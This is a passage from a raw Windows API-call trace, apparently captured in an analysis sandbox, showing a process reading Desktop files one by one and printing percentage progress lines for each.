(_Size=0x20) returned 0x1c82e58 [0063.230] realloc (_Block=0x0, _Size=0xa) returned 0x1c898a0 [0063.230] strlen (_Str="54") returned 0x2 [0063.230] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0063.231] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots", cchWideChar=29, lpMultiByteStr=0x1c82010, cbMultiByte=29, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots \r", lpUsedDefaultChar=0x22e760) returned 29 [0063.231] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.232] fputs (in: _Str=" 54% 27 + moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.232] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.233] free (_Block=0x1c84ef8) [0063.233] malloc (_Size=0x58) returned 0x1c87f20 [0063.233] malloc (_Size=0x8) returned 0x1c89e18 [0063.233] malloc (_Size=0x88) returned 0x1c895d8 [0063.233] free (_Block=0x1c89e18) [0063.233] malloc (_Size=0x88) returned 0x1c89668 [0063.233] free (_Block=0x1c895d8) [0063.233] malloc (_Size=0xc) returned 0x1c898e8 [0063.233] malloc (_Size=0x88) returned 0x1c895d8 [0063.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\vh5mbus\\ymkqzqm.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.233] free (_Block=0x1c89668) [0063.233] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x16291, lpOverlapped=0x0) returned 1 [0063.236] SetEvent (hEvent=0xd4) returned 1 [0063.236] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.236] GetTickCount () returned 0x1147427 [0063.236] strcmp (_Str1="+", _Str2="+") returned 0 [0063.236] wcscmp (_String1="moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots", _String2="moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots") returned 0 [0063.237] strlen (_Str="57") returned 0x2 [0063.238] strcmp (_Str1=" 57%", _Str2=" 54%") returned 1 [0063.238] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0063.238] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots", cchWideChar=29, lpMultiByteStr=0x1c82010, cbMultiByte=29, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots \r", lpUsedDefaultChar=0x22e868) returned 29 [0063.238] strcmp (_Str1=" 54% 27 + moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots", _Str2=" 57% 27 + moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots") returned -1 [0063.238] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.239] fputs (in: _Str=" 57% 27 + moG2C7rzW\\Vh5MbuS\\yMkqzqM.ots", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.239] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.239] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.240] free (_Block=0x1c895d8) [0063.240] free (_Block=0x1c898e8) [0063.240] CloseHandle (hObject=0xe8) returned 1 [0063.240] free (_Block=0x1c87f20) [0063.240] SetEvent (hEvent=0xd4) returned 1 [0063.240] free (_Block=0x1c898d0) [0063.240] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.315] free (_Block=0x1c89e08) [0063.315] free (_Block=0x1c80820) [0063.315] free (_Block=0x1c82e58) [0063.315] free (_Block=0x0) [0063.315] free (_Block=0x0) [0063.315] free (_Block=0x0) [0063.315] malloc (_Size=0x8) returned 0x1c89e08 [0063.315] malloc (_Size=0x3c) returned 0x1c84ef8 [0063.315] free (_Block=0x1c89e08) [0063.315] malloc (_Size=0xc) returned 0x1c898a0 [0063.315] malloc (_Size=0x3c) returned 0x1c84eb0 [0063.315] free (_Block=0x1c84ef8) [0063.316] free (_Block=0x27fbf0) [0063.316] free (_Block=0x27fbe0) [0063.316] free (_Block=0x27fb60) [0063.316] free (_Block=0x1c85bb8) [0063.316] GetTickCount () returned 0x1147485 [0063.316] malloc (_Size=0x60) returned 0x1c85bb8 [0063.316] free (_Block=0x0) [0063.316] malloc (_Size=0x1) returned 0x27fb60 [0063.316] free (_Block=0x0) [0063.316] malloc (_Size=0x4) returned 0x27fbe0 [0063.316] free (_Block=0x0) [0063.316] malloc (_Size=0x8) returned 0x27fbf0 [0063.316] malloc (_Size=0x18) returned 0x1c80820 [0063.316] ResetEvent (hEvent=0xd0) returned 1 [0063.316] ResetEvent (hEvent=0xd4) returned 1 [0063.316] ResetEvent (hEvent=0xd8) returned 1 [0063.316] malloc (_Size=0x20) returned 0x1c82e58 [0063.317] realloc (_Block=0x0, _Size=0xa) returned 0x1c898d0 [0063.317] strlen (_Str="57") returned 0x2 [0063.317] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="n8BHx-R0jAFi.mkv", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0063.317] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="n8BHx-R0jAFi.mkv", cchWideChar=16, lpMultiByteStr=0x1c82010, cbMultiByte=16, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="n8BHx-R0jAFi.mkv \r", lpUsedDefaultChar=0x22e760) returned 16 [0063.317] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.318] fputs (in: _Str=" 57% 28 + n8BHx-R0jAFi.mkv", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.319] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.319] free (_Block=0x1c8a2c8) [0063.319] malloc (_Size=0x58) returned 0x1c87f20 [0063.319] malloc (_Size=0x8) returned 0x1c89e38 [0063.319] malloc (_Size=0x6e) returned 0x1c86818 [0063.319] free (_Block=0x1c89e38) [0063.319] malloc (_Size=0x6e) returned 0x1c867a0 [0063.319] free (_Block=0x1c86818) [0063.319] malloc (_Size=0xc) returned 0x1c89918 [0063.319] malloc (_Size=0x6e) returned 0x1c86818 [0063.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\n8BHx-R0jAFi.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n8bhx-r0jafi.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.319] free (_Block=0x1c867a0) [0063.319] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x9e5f, lpOverlapped=0x0) returned 1 [0063.321] SetEvent (hEvent=0xd4) returned 1 [0063.321] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.322] GetTickCount () returned 0x1147485 [0063.322] strcmp (_Str1="+", _Str2="+") returned 0 [0063.322] wcscmp (_String1="n8BHx-R0jAFi.mkv", _String2="n8BHx-R0jAFi.mkv") returned 0 [0063.322] strlen (_Str="59") returned 0x2 [0063.322] strcmp (_Str1=" 59%", _Str2=" 57%") returned 1 [0063.322] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="n8BHx-R0jAFi.mkv", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0063.322] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="n8BHx-R0jAFi.mkv", cchWideChar=16, lpMultiByteStr=0x1c82010, cbMultiByte=16, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="n8BHx-R0jAFi.mkv \r", lpUsedDefaultChar=0x22e868) returned 16 [0063.322] strcmp (_Str1=" 57% 28 + n8BHx-R0jAFi.mkv", _Str2=" 59% 28 + n8BHx-R0jAFi.mkv") returned -1 [0063.322] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.323] fputs (in: _Str=" 59% 28 + n8BHx-R0jAFi.mkv", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.324] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.324] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.324] free (_Block=0x1c86818) [0063.324] free (_Block=0x1c89918) [0063.324] CloseHandle (hObject=0xe8) returned 1 [0063.324] free (_Block=0x1c87f20) [0063.325] SetEvent (hEvent=0xd4) returned 1 [0063.325] free (_Block=0x1c89900) [0063.325] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.326] free (_Block=0x1c89e28) [0063.326] free (_Block=0x1c8ac00) [0063.326] free (_Block=0x1c82e58) [0063.326] free (_Block=0x0) [0063.326] free (_Block=0x0) [0063.326] free (_Block=0x0) [0063.326] malloc (_Size=0x8) returned 0x1c89e28 [0063.326] malloc (_Size=0x22) returned 0x1c8a2c8 [0063.326] free (_Block=0x1c89e28) [0063.326] malloc (_Size=0xc) returned 0x1c898d0 [0063.327] malloc (_Size=0x22) returned 0x1c8a298 [0063.327] free (_Block=0x1c8a2c8) [0063.327] free (_Block=0x27fbf0) [0063.327] free (_Block=0x27fbe0) [0063.327] free (_Block=0x27fb60) [0063.327] free (_Block=0x1c85bb8) [0063.327] GetTickCount () returned 0x1147485 [0063.327] malloc (_Size=0x60) returned 0x1c85bb8 [0063.327] free (_Block=0x0) [0063.327] malloc (_Size=0x1) returned 0x27fb60 [0063.327] free (_Block=0x0) [0063.327] malloc (_Size=0x4) returned 0x27fbe0 [0063.327] free (_Block=0x0) [0063.327] malloc (_Size=0x8) returned 0x27fbf0 [0063.327] malloc (_Size=0x18) returned 0x1c8ac00 [0063.327] malloc (_Size=0x94) returned 0x1c895d8 [0063.327] realloc (_Block=0x0, _Size=0xa) returned 0x1c89900 [0063.327] strlen (_Str="59") returned 0x2 [0063.327] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="nF mzbmLsvv0e1OlZm.gif", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0063.328] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="nF mzbmLsvv0e1OlZm.gif", cchWideChar=22, lpMultiByteStr=0x1c82010, cbMultiByte=22, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="nF mzbmLsvv0e1OlZm.gif \r", lpUsedDefaultChar=0x22e760) returned 22 [0063.328] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.329] fputs (in: _Str=" 59% 29 + nF mzbmLsvv0e1OlZm.gif", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.330] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.330] free (_Block=0x1c87f20) [0063.330] malloc (_Size=0x58) returned 0x1c87f20 [0063.330] malloc (_Size=0x8) returned 0x1c89e58 [0063.330] malloc (_Size=0x7a) returned 0x1c89678 [0063.330] free (_Block=0x1c89e58) [0063.330] malloc (_Size=0x7a) returned 0x1c89700 [0063.330] free (_Block=0x1c89678) [0063.330] malloc (_Size=0xc) returned 0x1c89948 [0063.330] malloc (_Size=0x7a) returned 0x1c89678 [0063.330] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nF mzbmLsvv0e1OlZm.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nf mzbmlsvv0e1olzm.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.331] free (_Block=0x1c89700) [0063.331] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x1268a, lpOverlapped=0x0) returned 1 [0063.333] SetEvent (hEvent=0xd4) returned 1 [0063.333] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.334] GetTickCount () returned 0x1147494 [0063.334] strcmp (_Str1="+", _Str2="+") returned 0 [0063.334] wcscmp (_String1="nF mzbmLsvv0e1OlZm.gif", _String2="nF mzbmLsvv0e1OlZm.gif") returned 0 [0063.334] strlen (_Str="62") returned 0x2 [0063.334] strcmp (_Str1=" 62%", _Str2=" 59%") returned 1 [0063.334] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="nF mzbmLsvv0e1OlZm.gif", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0063.334] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="nF mzbmLsvv0e1OlZm.gif", cchWideChar=22, lpMultiByteStr=0x1c82010, cbMultiByte=22, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="nF mzbmLsvv0e1OlZm.gif \r", lpUsedDefaultChar=0x22e868) returned 22 [0063.334] strcmp (_Str1=" 59% 29 + nF mzbmLsvv0e1OlZm.gif", _Str2=" 62% 29 + nF mzbmLsvv0e1OlZm.gif") returned -1 [0063.334] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.335] fputs (in: _Str=" 62% 29 + nF mzbmLsvv0e1OlZm.gif", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.336] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.336] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.336] free (_Block=0x1c89678) [0063.336] free (_Block=0x1c89948) [0063.336] CloseHandle (hObject=0xe8) returned 1 [0063.337] free (_Block=0x1c87f20) [0063.337] SetEvent (hEvent=0xd4) returned 1 [0063.337] free (_Block=0x1c89930) [0063.337] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.339] malloc (_Size=0x128) returned 0x1c89678 [0063.339] wcscmp (_String1="nF mzbmLsvv0e1OlZm.gif", _String2="nF mzbmLsvv0e1OlZm.gif") returned 0 [0063.339] strlen (_Str="62") returned 0x2 [0063.339] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="nF mzbmLsvv0e1OlZm.gif", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0063.340] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="nF mzbmLsvv0e1OlZm.gif", cchWideChar=22, lpMultiByteStr=0x1c82010, cbMultiByte=22, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="nF mzbmLsvv0e1OlZm.gif \r", lpUsedDefaultChar=0x22e9a8) returned 22 [0063.340] strcmp (_Str1=" 62% 29 + nF mzbmLsvv0e1OlZm.gif", _Str2=" 62% 30 + nF mzbmLsvv0e1OlZm.gif") returned -1 [0063.340] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.340] fputs (in: _Str=" 62% 30 + nF mzbmLsvv0e1OlZm.gif", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.364] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.364] malloc (_Size=0x60) returned 0x1c85bb8 [0063.364] free (_Block=0x0) [0063.364] malloc (_Size=0x1) returned 0x27fb60 [0063.364] free (_Block=0x0) [0063.364] malloc (_Size=0x4) returned 0x27fbe0 [0063.364] free (_Block=0x0) [0063.364] malloc (_Size=0x8) returned 0x27fbf0 [0063.364] malloc (_Size=0x18) returned 0x1c8ac20 [0063.364] ResetEvent (hEvent=0xd0) returned 1 [0063.364] ResetEvent (hEvent=0xd4) returned 1 [0063.364] ResetEvent (hEvent=0xd8) returned 1 [0063.365] malloc (_Size=0x20) returned 0x1c82e58 [0063.365] realloc (_Block=0x0, _Size=0xa) returned 0x1c89930 [0063.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q8JQsFRXk.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q8jqsfrxk.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.365] free (_Block=0x1c866d0) [0063.365] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x578c, lpOverlapped=0x0) returned 1 [0063.367] SetEvent (hEvent=0xd4) returned 1 [0063.367] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.369] GetTickCount () returned 0x11474b3 [0063.369] strcmp (_Str1="+", _Str2="+") returned 0 [0063.369] strlen (_Str="62") returned 0x2 [0063.369] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="q8JQsFRXk.mp4", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0063.369] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="q8JQsFRXk.mp4", cchWideChar=13, lpMultiByteStr=0x1c82010, cbMultiByte=13, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="q8JQsFRXk.mp4 \r", lpUsedDefaultChar=0x22e868) returned 13 [0063.369] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.371] fputs (in: _Str=" 62% 30 + q8JQsFRXk.mp4", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.373] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.373] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.374] free (_Block=0x1c86660) [0063.374] free (_Block=0x1c89978) [0063.374] CloseHandle (hObject=0xe8) returned 1 [0063.374] free (_Block=0x1c89330) [0063.374] SetEvent (hEvent=0xd4) returned 1 [0063.374] free (_Block=0x1c89960) [0063.374] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.386] free (_Block=0x1c89e68) [0063.387] free (_Block=0x1c8ac40) [0063.387] free (_Block=0x1c82e58) [0063.387] free (_Block=0x0) [0063.387] free (_Block=0x0) [0063.387] free (_Block=0x0) [0063.387] malloc (_Size=0x8) returned 0x1c89e68 [0063.387] malloc (_Size=0x1c) returned 0x1c82e58 [0063.387] free (_Block=0x1c89e68) [0063.387] malloc (_Size=0xc) returned 0x1c89930 [0063.387] malloc (_Size=0x1c) returned 0x1c82e08 [0063.387] free (_Block=0x1c82e58) [0063.387] free (_Block=0x27fbf0) [0063.387] free (_Block=0x27fbe0) [0063.387] free (_Block=0x27fb60) [0063.387] free (_Block=0x1c85bb8) [0063.387] GetTickCount () returned 0x11474c3 [0063.387] malloc (_Size=0x60) returned 0x1c85bb8 [0063.387] free (_Block=0x0) [0063.387] malloc (_Size=0x1) returned 0x27fb60 [0063.388] free (_Block=0x0) [0063.388] malloc (_Size=0x4) returned 0x27fbe0 [0063.388] free (_Block=0x0) [0063.388] malloc (_Size=0x8) returned 0x27fbf0 [0063.388] malloc (_Size=0x18) returned 0x1c8ac40 [0063.388] ResetEvent (hEvent=0xd0) returned 1 [0063.388] ResetEvent (hEvent=0xd4) returned 1 [0063.388] ResetEvent (hEvent=0xd8) returned 1 [0063.388] malloc (_Size=0x20) returned 0x1c82e58 [0063.388] realloc (_Block=0x0, _Size=0xa) returned 0x1c89960 [0063.388] strlen (_Str="62") returned 0x2 [0063.388] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="RlpYGAIBP9RiAuiDEA1C.bmp", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0063.388] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="RlpYGAIBP9RiAuiDEA1C.bmp", cchWideChar=24, lpMultiByteStr=0x1c82010, cbMultiByte=24, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="RlpYGAIBP9RiAuiDEA1C.bmp \r", lpUsedDefaultChar=0x22e760) returned 24 [0063.388] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.411] fputs (in: _Str=" 62% 31 + RlpYGAIBP9RiAuiDEA1C.bmp", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.412] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.412] free (_Block=0x1c88740) [0063.412] malloc (_Size=0x58) returned 0x1c89330 [0063.412] malloc (_Size=0x8) returned 0x1c89e98 [0063.412] malloc (_Size=0x7e) returned 0x1c86660 [0063.412] free (_Block=0x1c89e98) [0063.412] malloc (_Size=0x7e) returned 0x1c866e8 [0063.412] free (_Block=0x1c86660) [0063.413] malloc (_Size=0xc) returned 0x1c899a8 [0063.413] malloc (_Size=0x7e) returned 0x1c86660 [0063.413] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RlpYGAIBP9RiAuiDEA1C.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rlpygaibp9riauidea1c.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.413] free (_Block=0x1c866e8) [0063.413] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0xffd0, lpOverlapped=0x0) returned 1 [0063.416] SetEvent (hEvent=0xd4) returned 1 [0063.416] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.416] GetTickCount () returned 0x11474e2 [0063.416] strcmp (_Str1="+", _Str2="+") returned 0 [0063.416] wcscmp (_String1="RlpYGAIBP9RiAuiDEA1C.bmp", _String2="RlpYGAIBP9RiAuiDEA1C.bmp") returned 0 [0063.416] strlen (_Str="65") returned 0x2 [0063.416] strcmp (_Str1=" 65%", _Str2=" 62%") returned 1 [0063.416] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="RlpYGAIBP9RiAuiDEA1C.bmp", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0063.416] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="RlpYGAIBP9RiAuiDEA1C.bmp", cchWideChar=24, lpMultiByteStr=0x1c82010, cbMultiByte=24, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="RlpYGAIBP9RiAuiDEA1C.bmp\r", lpUsedDefaultChar=0x22e868) returned 24 [0063.416] strcmp (_Str1=" 62% 31 + RlpYGAIBP9RiAuiDEA1C.bmp", _Str2=" 65% 31 + RlpYGAIBP9RiAuiDEA1C.bmp") returned -1 [0063.416] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.417] fputs (in: _Str=" 65% 31 + RlpYGAIBP9RiAuiDEA1C.bmp", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.418] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.418] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.419] free (_Block=0x1c86660) [0063.419] free (_Block=0x1c899a8) [0063.419] CloseHandle (hObject=0xe8) returned 1 [0063.419] free (_Block=0x1c89330) [0063.419] SetEvent (hEvent=0xd4) returned 1 [0063.419] free (_Block=0x1c89990) [0063.419] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.422] free (_Block=0x1c89e88) [0063.422] free (_Block=0x1c8ac60) [0063.422] free (_Block=0x1c82e58) [0063.422] free (_Block=0x0) [0063.422] free (_Block=0x0) [0063.422] free (_Block=0x0) [0063.422] malloc (_Size=0x8) returned 0x1c89e88 [0063.422] malloc (_Size=0x32) returned 0x1c88740 [0063.422] free (_Block=0x1c89e88) [0063.422] malloc (_Size=0xc) returned 0x1c89960 [0063.422] malloc (_Size=0x32) returned 0x1c88700 [0063.422] free (_Block=0x1c88740) [0063.423] free (_Block=0x27fbf0) [0063.423] free (_Block=0x27fbe0) [0063.423] free (_Block=0x27fb60) [0063.423] free (_Block=0x1c85bb8) [0063.423] GetTickCount () returned 0x11474e2 [0063.423] malloc (_Size=0x60) returned 0x1c85bb8 [0063.423] free (_Block=0x0) [0063.423] malloc (_Size=0x1) returned 0x27fb60 [0063.423] free (_Block=0x0) [0063.423] malloc (_Size=0x4) returned 0x27fbe0 [0063.423] free (_Block=0x0) [0063.423] malloc (_Size=0x8) returned 0x27fbf0 [0063.423] malloc (_Size=0x18) returned 0x1c8ac60 [0063.423] ResetEvent (hEvent=0xd0) returned 1 [0063.423] ResetEvent (hEvent=0xd4) returned 1 [0063.424] ResetEvent (hEvent=0xd8) returned 1 [0063.424] malloc (_Size=0x20) returned 0x1c82e58 [0063.424] realloc (_Block=0x0, _Size=0xa) returned 0x1c89990 [0063.424] strlen (_Str="65") returned 0x2 [0063.424] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="video_driver.exe", cchWideChar=16, 